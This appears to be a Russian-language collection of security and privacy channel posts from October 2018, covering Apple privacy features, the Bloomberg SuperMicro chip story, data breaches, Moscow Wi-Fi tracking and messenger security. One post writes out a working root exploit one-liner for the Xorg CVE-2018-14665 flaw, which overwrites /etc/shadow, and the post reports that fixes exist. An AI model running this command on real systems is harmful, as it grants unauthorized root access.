И говоря о сборе данных (как в истории с GM, например). Вчера Apple существенно обновила страницу Конфиденциальность, как компания регулярно делает к выходу новых версий своих операционных систем. На этой странице пользователи могут узнать о тех шагах, которые предпринимает Apple для сохранения конфиденциальной информации своих пользователей и их данных от самой себя, от сторонних приложений и других интересующихся этой информацией. Тут же отражены и те изменения, которые Apple внесла в последние версии iOS и macOS, например улучшения Internet Tracking Prevention в браузере Safari для ограничения слежки за пользователями в интернете. Очень полезная страница для тех, кто верит в то, что Apple действительно считает себя ответственной за сохранность конфиденциальности пользовательских данных (тех, кто не верит и считает это все маркетингом, никакая страница, конечно, не убедит).


В этом разделе сайта компании также можно больше узнать о том, как работают фреймворки машинного обучения Create ML и Core ML, функция ограничения времени работы с приложениями Screen Time, и какие требования с точки зрения конфиденциальности Apple выдвигает к навигационным приложениям для CarPlay.

Кроме этого, вчера Apple также запустила возможность загрузки данных, которые есть у компании "на пользователя". Пока что эта возможность есть у пользователей из Австралии, США, Новой Зеландии и Канады. Я запросил этот архив, но пока что данные не получил (Apple берет 7 дней на сборку данных):

(https://alexmak.net/wp-content/uploads/2018/10/Screen-Shot-2018-10-18-at-11.31.39-AM.png)

Когда архив придет, я расскажу, если обнаружу там что-то интересное. Кроме этих данных, можно запросить также документы, хранящиеся в iCloud Drive, почту iCloud и фотографии iCloud Photos, но эти данные у меня и так есть, поэтому я не видел смысла в их запросе. Часть данных, пишет Apple, может быть недоступна по следующим причинам:

Если какие-либо сведения не были предоставлены, это значит, что они существуют в формате, не подлежащем персональной идентификации, или не связаны с вашим идентификатором Apple ID, зашифрованы сквозным способом и не могут быть расшифрованы или вообще храниться компанией Apple. Кроме того, некоторые данные могли храниться в течение крайне непродолжительного срока и больше недоступны на наших серверах.

Apple достаточно успешно позиционирует себя как компанию, которая не нуждается в пользовательских данных для того, чтобы делать свои сервисы лучше. Глядя на то, как развиваются облачные сервисы конкурентов — той же Google, например — иногда ловишь себя на мысли, что у Google, не предлагающей такой прозрачности, получается лучше. А потом смотришь на то, как ведет себя Facebook с пользовательскими данными, и думаешь "нет, пусть уж лучше как Apple".

Уже прошло больше двух недель с того момента, как в Bloomberg появилась душераздирающая и крышесносящая история про то, как китайские военные втихаря устанавливали на китайской фабрике микрочипы в сервера американской компании SuperMicro. Потом эти сервера якобы оказывались в дата-центрах Apple, Amazon и еще нескольких десятков компаний, и китайские разведчики начинали, видимо, следить за данными на серверах, или доступаться к ним удаленно, или еще что-нибудь не менее ужасное.

С тех пор историю опровергли Apple и Amazon, а также британская разведка и американское министерство национальной безопасности, и еще много кто. Возможно, те "десятки" других компаний, о которых Bloomberg упоминали в статье, могли бы тоже опровергнуть, но мы не знаем, кто они — никаких имен предоставлено не было.


Потом было еще продолжение о якобы микрочипах в портах Ethernet (тоже серверов компании SuperMicro) у какой-то крупной американской телекоммуникационной компании. Эту историю, в свою очередь, опровергли все основные телеком-компании в США. Вчера к этому хору отрицающих знание об этой истории добавился еще директор Службы национальной разведки США Дэн Коатс, который сказал, что "мы ничего такого не видели, но продолжаем наблюдать".

Теоретически, конечно, подобная история может существовать: аппаратные импланты не являются чем-то новым, и что-то подобное могло произойти, происходит сейчас или произойдет в будущем. Но проблема именно этой истории, начавшейся с публикации в Bloomberg, заключается в том, что на данный момент никаких доказательств заявленному в статье нет, и издание хранит гордое молчание по этому поводу. Все иллюстрации в первоначальной статье — тот самый чип на кончике карандаша — это именно иллюстрации, созданные художниками издания.
(https://alexmak.net/wp-content/uploads/2018/10/Screen-Shot-2018-10-05-at-12.15.58-PM.png)

Но подобная история, если Bloomberg так и не предоставит никаких доказательств, все равно будет жить — в качестве "городского мифа", передаваемого и модифицируемого "испорченным телефоном" интернета, возможно, даже обрастая какими-то новыми подробностями. Без реальных фактов, без качественных доказательств пока что статья в Bloomberg превращается в самый большой провал издания в направлении информационной безопасности. А там, глядишь, и до "fake news" недалеко.

1. Интересные результаты опроса, в котором оказалось, что многие люди, пользующиеся WhatsApp, не знают, что сервис принадлежит Facebook
https://spreadprivacy.com/facebook-whatsapp/

(https://alexmak.net/wp-content/uploads/2018/10/facebook-whatsapp-v2-1.png)

2. Что делать, если ваш аккаунт оказался среди затронутых недавним взломом Facebook
https://www.eff.org/deeplinks/2018/10/what-do-if-your-account-was-caught-facebook-breach

3. страничка уязвимости CVE-2018-10933 — той самой, затронувшей libssh. там же Docker-контейнер с уязвимостью, для экспериментов
https://github.com/hackerhouse-opensource/cve-2018-10933

4. кстати, о GitHub. Теперь там поддерживаются Security Alerts для проектов Java/.Net (это когда проект сканируется на предмет устаревших зависимостей).
https://www.zdnet.com/article/github-security-alerts-now-support-java-and-net-projects/

https://www.youtube.com/watch?v=odG2GX4_cUQ

В руках одного чувака - планшет с усилителем сигнала брелка, у второго, возле водительской двери — видимо, устройство, имитирующее ключ. Брелок, по словам владельца автомобиля, лежал далеко в доме, но усилитель помог добросить сигнал. У машины был отключен ввод PIN, а также включён пассивный доступ (когда двери разблокируются при приближении ключа). Интересно, что у меня по соседству так недавно угнали несколько BMW и Mercedes - усилив сигнал от брелка и прокинув команды разблокировки автомобиля. Цифровой доступ без ключа — это удобно, но имеет свои недостатки.

Читатель тут прислал ссылку, которую я дублировать не буду, но прокомментировать хочется:

Городской сервис ремонта цифровых устройств «Чудо техники» до 6 ноября проводит акцию «Диагностика за спасибо». Специалисты подскажут, что именно замедляет работу устройства, есть ли на нем вирусы или шпионские программы, и посоветуют, как решить другие проблемы с техникой. Пройти бесплатную цифровую диагностику можно только один раз, для этого необходимо оформить заявку на сайте проекта. Консультации проводят ежедневно, кроме воскресенья, с 10:00 до 20:00.

Во время проверки мастер не приходит к пользователям домой, а удаленно подключается к их устройствам со своего рабочего компьютера. Для этого нужно иметь доступ к интернету. Сама процедура длится около 20 минут. Абонент увидит все действия мастера и сможет контролировать их. Специалист получит возможность лишь единожды с позволения абонента подключиться к его компьютеру. Доступ будет временным, и повторить попытку мастер не сможет”

Это все, конечно, хорошо, но что-то я не уверен, что это очень хорошая идея пускать удаленно на свой компьютер кого попало и как попало. Допускаю, что они используют какой-нибудь Team Viewer с разовой сессией, но все равно я бы поостерегся таких бесплатных услуг. Понятно, что в канале читатели, которые и сами с подобными задачами на своем компьютере и компьютерах родственников это сделают, но, может, донесите там до окружающих, что осторожность не помешает. "Следи за собой, будь осторожен, "

- 75 тысяч записей с портала для записи в программу страхования здоровья в США. Непонятно, какие именно данные утекли.

https://www.zdnet.com/article/hackers-steal-data-of-75000-users-after-healthcare-gov-ffe-breach/

- Взлом сразу 8 сайтов одной компании, где взрослые люди делились обнаженными фотографиями своих партнеров (но зачем?). Сайты какие-то древние, но они все равно функционировали, и недавно всплыл 98МБ файл с IP-адресами, с 1,2 млн адресов электронной почты пользователей, именами и паролями, зашифрованными каким-то древним алгоритмом Descrypt
https://arstechnica.com/information-technology/2018/10/hack-on-8-adult-websites-exposes-oodles-of-intimate-user-data/

- просто эпичная история о том, как чувак запросил в рамках системы прозрачности местного правительства метаданные о переписке правительства города Сиэтла с жителями города, и в ответ случайно получил 32 млн записей, включая 256 первых букв из каждого письма, где можно было найти и номера кредиток, и пароли, и информацию о расследованиях ФБР, и много всего другого интересного. Когда он сообщил в IT-отдел города об их факапе, те заставили чувака данные удалить. Но вся история сама по себе прекрасная просто, включая тот факт, что чувак заплатил за эти данные 40 долларов.

https://mchap.io/that-time-the-city-of-seattle-accidentally-gave-me-32m-emails-for-40-dollars4997.html

Издание Bloomberg, опубликовавшее статью о якобы китайских шпионских чипах в серверах SuperMicro, использующихся в датацентрах Apple, Amazon и других компаний, продолжает хранить гордое молчание, несмотря на призывы всех, кого только можно, либо предоставить доказательства об истории, изложенной в той статье.

Я внимательно слежу за этой историей, потому что мне очень интересно, чем она закончится, поэтому я постоянно публикую свежие обновления, появляющиеся по этой теме. С момента последней заметки:

1. Тим Кук в телефонном интервью BuzzFeed призвал издание отозвать статью, сказав, что в ней нет правды касательно Apple:

“There is no truth in their story about Apple. They need to do the right thing and retract it."


2. С этим же призывом выступил Энди Джесси, руководитель направления AWS в Amazon:

@timcook is right. Bloomberg story is wrong about Amazon, too. They offered no proof, story kept changing, and showed no interest in our answers unless we could validate their theories. Reporters got played or took liberties. Bloomberg should retract.

3. СЕО компании SuperMicro — производителя этих серверов — тоже передал заявление CNBC о том, что Bloomberg должны отозвать статью. При этом компания запускает дополнительно исследование серверов на предмет посторонних чипов.

4. Журналисты The Washington Post также призывают Bloomberg предоставить доказательства или отозвать статью, иначе репутация издания и их отдела расследований пострадает.

Есть закономерный вопрос по поводу того, почему Apple и Ко не подадут в таком случае на Bloomberg в суд. Все-таки речь идет о репутации публичных компаний, и подобная статья приводит к изменению стоимости этих компаний, что в численном выражении может составлять миллиарды долларов (правда, денег акционеров, а не денег компаний, но публичные компании обязаны делать все для сохранения стоимости для акционеров). Если нарисовать более темный сценарий, то обвинения Китая в таких действиях — это вообще ситуация, которая при неудачном стечении обстоятельств могла бы и к войне привести. Так что это не просто "статейка", это серьезный материал в серьезном издании, и если материал оказался не соответствующим действительности, то издание должно взять на себя ответственность. Возможно, если Bloomberg продолжит настаивать на своей точке зрения, не отзовет статью и не предоставит дополнительных доказательств, то Apple и Amazon подадут в суд на издание. Если же Bloomberg опубликует дополнительные материалы, тогда будет еще более весело.

В качестве бонуса для тех, кто дочитал сюда, хочу дать дополнительную ссылку на большой материал-исследование заявлений, сделанных Bloomberg в статье. Из нее вы узнаете, что технические детали, опубликованные в Bloomberg, не соответствуют действительности и реальности. Примеры с подобными встроенными чипами, по мнению авторов STH, не могут работать так, как это описано в статье Bloomberg. Короче, я очень рекомендую почитать статью на ServerTheHome.

‌Злоумышленники взломали системы авиакомпании Cathay Pacific и её подразделения Hong Kong Dragon Airlines Limited, и получили доступ к данным 9,4 млн клиентов компании. Данные клиентов компании, которые могли быть затронуты во время незаконного доступа, включают в себя (но варьируются от пассажира к пассажиру):
паспортные данные,
дату рождения
информацию о идентификационных картах,
контактную информацию,
информацию о банковских картах (небольшое количество),
историю перелетов.

Пароли пользователей не были затронуты. Взлом произошел в марте.

В новостном разделе сайта компании тихо. На фоне этого всего политика конфиденциальности компании и список хранимых данных на пассажиров читается в новом ключе.

https://www.cathaypacific.com/cx/en_US/legal-and-privacy/customer-privacy-policy.html

(иногда мне кажется, что либо глючит плагин репоста из Вордпресса, либо разработчики Телеграма ежедневно переписывают парсер HTML, либо же глючу я и мы все давно умерли и живем в параллельной реальности. простите, был напуган)

Пользователям iOS 12 может быть полезно воспользоваться Шорткатом для проверки адреса электронной почты на предмет наличия в различных источниках утекшей за последние несколько лет информации (хотя, подозреваю, читатели канала давно это уже сделали без всяких шорткатов). Ссылка на шорткат:
https://www.icloud.com/shortcuts/12f9efa03ada4d2a9876f6647d94e8c3

(автор)

Шорткат отправляет запрос с адресом электронной почты по API на сайт HaveIBeenPwned.com, и выдает список сайтов, в утечках которого зарегистрирован указанный адрес. Дальше все в ваших руках — изменить пароли на этих сайтах, если вы еще не меняли их, и разработчики сайта не сбросили его автоматически, и убедиться, что эта комбинация логина и пароля не используется на других сайтах.

Лонг-рид, но очень интересный. О компании, которая скупала приложения в Google Play Store, а затем скрытно трекала поведение пользователей в этих приложениях. На основе собранной информации компания тренировала ботов, чтобы их поведение было похожим на человеческое. С помощью этих тренированных ботов компания, скупавшая приложение, могла обманывать системы детекции фрода при показе рекламы, и таким образом генерить сотни миллионов долларов на показах рекламы фейковым ботам.

https://www.buzzfeednews.com/article/craigsilverman/how-a-massive-ad-fraud-scheme-exploited-android-phones-to

Схема, как это все работает:
(https://alexmak.net/wp-content/uploads/2018/10/sub-buzz-29656-1540235855-3.jpg)

В битве Apple против компании Grayshift, которая продает правоохранительным органам устройства по получению информации из iPhone (о которых я неоднократно писал в канале), кажется, очередной раунд остался за Apple. (Я сразу уточню, что точной информации о том, каким методом Grayshift научилась получать доступ к iPhone, неизвестно. Известно только, что после подключения к их коробочке устройство начинало перебирать пароли, и если пароль был 4-значный, то достаточно быстро устройство начинало сливать содержимое памяти устройства. Точные методы происходящего, да и вообще любая дополнительная информация были достаточно расплывчаты).

Издание Forbes пишет, что, по информации от множества источников, устройства GrayKey больше не могут перебирать пароли на устройствах с iOS 12. На таких гаджетах GrayKey может доставать только незашифрованные файлы (все пользовательские файлы в iOS шифруются по умолчанию), а также некоторые метаданные - размеры файлов и структуру папок. И похоже, что речь не о USB restrictions mode, о котором я также много писал, а именно о блокировке доступа к зашифрованным файлам. Будет очень интересно посмотреть, смогут ли Grayshift обойти эту блокировку, потому что эта игра в кошки-мышки очень увлекательная.

Медуза опубликовала материал о том, как оператор городского WiFi в Москве следит за пользователями и пытается таргетировать рекламу пользователям на основе собранных им данных. Однажды попав в базу МТ, пользователи "отдают" провайдеру MAC-адрес своего устройства, после чего тот, наводнив город своими базами WiFi, начинает эту информацию использовать для дополнения другой информацией и отслеживания привычек.

Однажды попав в базу, профиль пользователя начинает обрастать информацией: в нем сохраняются все его перемещения, данные о поле, возрасте, уровне дохода, интересах (на основании анализа посещаемых через вайфай сайтов), технические характеристики смартфона.

Я не буду спойлить остальную статью, сходите по ссылке и почитайте. Меня удивляет, что компания так гордо рассказывает об этом мониторинге пользователей (я уверен, идентифицировать конкретного человека и его перемещения с имеющейся у МТ и в интернете информации им не составит труда). А уж какой потенциал для того, кто решит, что можно эту информацию получить, например, незаконным образом. Тем более, что факапы с безопасностью этих самых профилей у МТ уже были. Лучше бы во второй части статьи Артем Пуликов из „Максима Телеком“ рассказал о том, они обеспечивают безопасное хранение этой информации от доступа внутри и извне. Или же, например, как в рамках того же GDPR можно было бы попросить компанию удалить все имеющиеся на конкретного пользователя данные.


Сама вся эта история, конечно, далеко не новая, и не МТ её придумала. Именно поэтому, начиная с iOS 8 и Android 5.0, в операционные системы была встроена функциональность рандомизации MAC-адресов при таком "внешнем сканировании" со стороны точек WiFi (подключение к сети все равно раскрывало настоящий MAC-адрес адаптера WiFi). В Android P пошли даже дальше, и научили операционную систему при подключении к сети отдавать каждый раз новый MAC-адрес. (как минимум, это было в бета-версиях, не уверен, доехала ли эта фича до релиза. кроме того, она, кажется, была выключена по умолчанию. так что у кого Android P — проверьте).
АПД от читателей — пишут, что опция дошла, спрятана в опциях разработчиков и по умолчанию выключена.
Хотелось бы, конечно, побольше таких инструментов. Вот, кстати, очень интересное исследование о рандомизации MAC-адресов в мобильных устройствах (PDF) в тему.

"Нам не стремно. Большинству людей тоже не стремно."
Не стремно им, вы посмотрите на него.

PS
В 2018 году в соцсетях жителей крупных городов появилось много постов, описывающих примерно такую ситуацию: человек проходит мимо кафе, а позже видит в ленте фейсбука рекламный баннер того самого кафе. Сначала это казалось странным совпадением, но со временем стало очевидно, что так часто совпадения не происходят. Технологию, позволяющую следить за пользователями и предлагать им подходящую рекламу, использует компания «Максима Телеком».

Я надеюсь, этот пример должен уменьшить количество любителей теории заговоров "фейсбук слушает мой микрофон, поэтому мне подсовывает соответствующую рекламу". Хоть какая-то польза.

На фоне новостей о слежке за пользователями со стороны WiFi-провайдера в Москве, выступление Тима Кука в Брюсселе вчера смотрится особенно актуально. Выступая на конференции, посвященной конфиденциальности данных (Conference of Data Protection and Privacy Commissioners (ICDPPC)), Тим Кук в достаточно жестких выражениях озвучил то, что происходит сегодня с пользовательскими данными:

"Наша личная информация — от ежедневных событий до глубоко личной информации — используется в качестве оружия против нас с армейской эффективностью. Эти кусочки данных, каждый безвредный сам по себе, аккуратно собираются, синтезируются, обмениваются и продаются. В экстремальных кейсах этот процесс создает живучий цифровой профиль и позволяет компаниям узнавать вас лучше, чем вы знаете себя. Ваш профиль — это куча алгоритмов, которые выдают вам все более экстремальный контент, превращая наши безвредные предпочтения во вред".

Кук не указывал прямо на рекламно-технологических конкурентов вроде Google, Facebook и другие компании, занимающиеся сбором и обработкой пользовательских данных, но было совершенно очевидно, о ком он говорил. Кроме этого, в своем выступлении Тим Кук похвалил принятие и внедрение европейского законодательства по охране пользовательских данных General Data Protection Regulation (GDPR), и призвал американских законодателей на федеральном уровне принять подобный закон. GDPR принуждает компании, хранящие пользовательские данные, обеспечивать максимальную безопасность этим данным (а также обеспечивает право пользователей узнавать, какую информацию хранит компания о нем, и требовать удаления этой информации). Работает ли GDPR на самом деле — это другой вопрос: спама больше не стало, а кто и как там хранит мою информацию на самом деле узнать все еще не просто. (Зато удалось почитать политики конфиденциальности многих сервисов и сайтов и ужаснуться количеству всяких сторонних сервисов, с которыми эти сайты могут делиться теми или иными пользовательскими данными).

Дальше в Твиттере Тим Кук продублировал озвученные во время выступления четыре основных принципа защиты права на сохранность частной информации, которые во многом перекликаются с тем, о чем говорится в акте GDPR:
1. Компании должны либо применять усилия по деперсонализации пользовательских данных, либо не собирать эти данные вообще.
2. Пользователи должны знать, какая информация о них собирается и с какой целью.
3. Компании должны понимать, что данные принадлежат пользователям и должны обеспечивать возможность пользователям получить эту информацию, изменить или удалить.
4. У всех есть право на безопасность своих данных. Безопасность лежит в основе всех прав конфиденциальности данных.

Если есть время, посмотрите видео выступления целиком:
https://www.youtube.com/watch?v=kVhOLkIs20A

Можно любить или ненавидеть Apple, можно относиться к ней индифферентно, но Apple, по сути, практически единственная из крупных технологических компаний, которая занимает четкую позицию по отношению к конфиденциальным пользовательским данным и их безопасности, в том числе и в переговорах с правительствами разных стран. Да, иногда эта позиция бывает "гибкой" и ей приходится соответствовать законодательству этих стран (например, история с Китаем и VPN-клиентами в App Store, когда пришлось удалить несертифицированные правительством Китая приложения из магазина). Возможно, это счастливое совпадение, что позиция также хорошо вписывается в бизнес-модель Apple, когда нет необходимости эксплуатировать пользовательские данные для того, чтобы демонстрировать финансовую состоятельность.

Кто-то может называть это "маркетингом" (как будто это что-то плохое). Важно, что за маркетингом озвученной позиции и подобных выступлений есть масса различных действий Apple в разработке устройств и операционных систем, которые подтверждают, что все эти заявления и выступления — это не пустые слова, а реально позиция компании. Если это помогает Apple продавать больше iPhone — отлично, потому что в результате покупатели получают более безопасные устройства, обеспечивающие сохранность пользовательских данных.

(Если кого-то удивляет такой фокус моих постов на том, что говорит Apple о конфиденциальности персональных данных, я просто хочу напомнить, что из битвы двух якодзун Apple vs ФБР за сохранность шифрования iPhone, по сути, и вырос этот канал. )

Обнаруженная уязвимость CVE-2018-14665 затрагивает OpenBSD и большинство дистрибутивов Linux (включая Debian, Ubuntu, Red Hat, Fedora), и выглядит так:

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Эта уязвимость позволяет злоумышленникам с ограниченным доступом к системе (Например, через сессию SSH) повысить свои привилегии до уровня root.

Больше информации об уязвимости тут:
https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
и тут
https://lists.x.org/archives/xorg-announce/2018-October/002927.html

У OpenBSD уже есть фикс, для ваших любимых дистрибутивов линуксов следите за апдейтами у вендоров.

Сегодня у нас коллекция ссылок на тему.

1. Хакеры, в свое время взломавшие Uber и получившие доступ к миллионам пользовательских записей (а затем вынудили компанию заплатить выкуп, и замаскировать это под bug bounty), попались на другом взломе и были арестованы ФБР
https://techcrunch.com/2018/10/25/uber-hackers-indicted-lynda-breach/

2. База данных сотрудников Сбербанка утекла в сеть. Об этом стало известно еще на прошлой неделе (ссылку на базу прислал один из читателей), но теперь появилось и почти официальное подтверждение.
"О проблеме доложили Герману Грефу, который уже выразил свое недовольство, отметил один из собеседников "Ъ" в банке."
https://www.kommersant.ru/doc/3785052

3. Google теперь требует от официально лицензирующих Android компаний обязательно два года выпускать обновления безопасности для смартфонов под управлением этой операционной системы
https://www.theverge.com/2018/10/24/18019356/android-security-update-mandate-google-contract

Я уже выразил свое недовольство небольшим количеством ссылок сегодня.

Сразу два небольших апдейта о двух популярных мессенджерах, которые оба много говорят о своей безопасности. Действительно, и Telegram, и Signal позиционируют себя как мессенджеры с шифрованием, и предназначенные для общения таким образом, чтобы коммуникации пользователей не попадались на глаза кому попало. Компании используют разный подход, в частности, сообщения у Telegram по умолчанию не шифруются оконечным шифрованием — для этого нужно запускать специальные secret chats, в то время как у Signal все коммуникации по умолчанию зашифрованы. Но периодически и тот, и другой мессенджер попадают в новости с очередным ляпом в безопасности, поэтому сложно рекомендовать тот или иной. В интернете можно найти не одно исследование безопасности этих мессенджеров (вот, например, навскидку нагугленное исследование Telegram студентами MIT)

Например, в свое время у Signal оказалась лажа с сохранением истории чатов на Маке в открытом текстовом виде (к нему потом вышел апдейт). А тут прошла новость о том, что десктопный вариант Telegram к хранимым на компьютере данным с недостаточной защитой - база данных не шифруется, и поэтому даже контент секретных чатов можно прочитать, получив доступ к компьютеру пользователя. В целом, надо бы сказать, что, на мой взгляд, это не так ужасно, как могут попытаться подать некоторые СМИ.


Во-первых, Telegram никогда и не обещал шифровать данные на компьютере — компания обещала безопасные коммуникации, то есть шифрование общения в процессе, и хранение данных в это обещание не входит. А во-вторых, считается, что если уж злоумышленники получили доступ к содержимому пользовательского устройства, то гарантировать недоступность данных практически невозможно - это вопрос желания получить доступ к информации, времени и денег. Допустим, Telegram начнет шифровать содержимое базы данных паролем для открытия приложения. Какое-нибудь вредоносное ПО "вынюхает" этот пароль первым делом при его вводе. Так что в лучшем случае, что можно предложить пользователям в этом случае — это шифровать диск с помощью FileVault на Маке или BitLocker на Windows, и не читать до обеда советских газет.

А, кстати, еще про Signal. Разработчики мессенджера собираются выкатить новую фичу, которая позволит полностью скрыть личность отправителя сообщений - специальный "шифрованный конверт" заменит отправителя на специальный краткосрочный сертификат, используемый для подтверждения личности отправителя для сервера. А вот получатель этой информации не узнает. С точки зрения конечного пользователя ничего не изменится и будет выглядеть точно так же, как и сейчас.

https://signal.org/blog/sealed-sender/

Apple вчера опубликовала интересный документ про процессор T2, который в современных Маках обеспечивает довольно много функциональности:
- безопасную загрузку компьютера
- работу файловой системы APFS
- работу Touch ID на Маке

Весь PDF (15 страниц) сам по себе представляет интересный и познавательный материал, рекомендую почитать. Иногда пишут, что Apple сознательно блокирует ремонт компьютеров "на стороне", потому что хочет сама ремонтировать компьютеры и брать за это много денег. Не без этого, конечно, но вообще надо понимать, что компьютеры - это очень хороший и мощный вектор атаки на пользователя, и проверять целостность этого вектора это хорошая практика. Именно это и делает процессор T2 при загрузке компьютера, а сторонний ремонт и замена каких-то комплектующих может нарушать этот процесс.


Но еще один интересный момент скрывается на 13 странице документа:

All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid
is closed. This disconnect is implemented in hardware alone, and therefore prevents any software, even with root or kernel privileges in macOS, and even the software on the T2 chip, from engaging the microphone when the lid is closed. (The camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.)

Оказывается, теперь при закрытии крышки ноутбука микрофон аппаратно отключается от остальных систем компьютера, что предотвращает возможность любого ПО, вплоть до вредоносного ПО, которое каким-то образом получило права на уровне ядра, активировать микрофон компьютера. (А камеру не надо блокировать, потому что при закрытой крышке все равно никто ничего не увидит). Интересно другое — это, кажется, первое практически публичное признание Apple того факта, что у Маков тоже бывает вредоносное ПО.

несколько полезных и интересных ссылок на почитать:

- статья у ЛК на тему различных методов двухфакторной аутентификации (ура, я наконец-то написал это с первого раза, а не "авторизации")
https://www.kaspersky.ru/blog/2fa-practical-guide/21495/?es_p=7871008

- интересная уязвимость в Android (исправлена еще в июльском апдейте, а затем доисправлена в сентябрьском), позволяющая повышать права в системе приложениям, которым это не положено. Очень много технической информации:
https://blog.zimperium.com/cve-2018-9411-new-critical-vulnerability-multiple-high-privileged-android-services/

- недокументированные API в Google Home, позволяющие простым запросом перегружать устройства, получать списки будильников, отключать уведомления и заставлять забывать их о беспроводной сети:
https://jerrygamblin.com/2018/10/29/google-home-insecurity/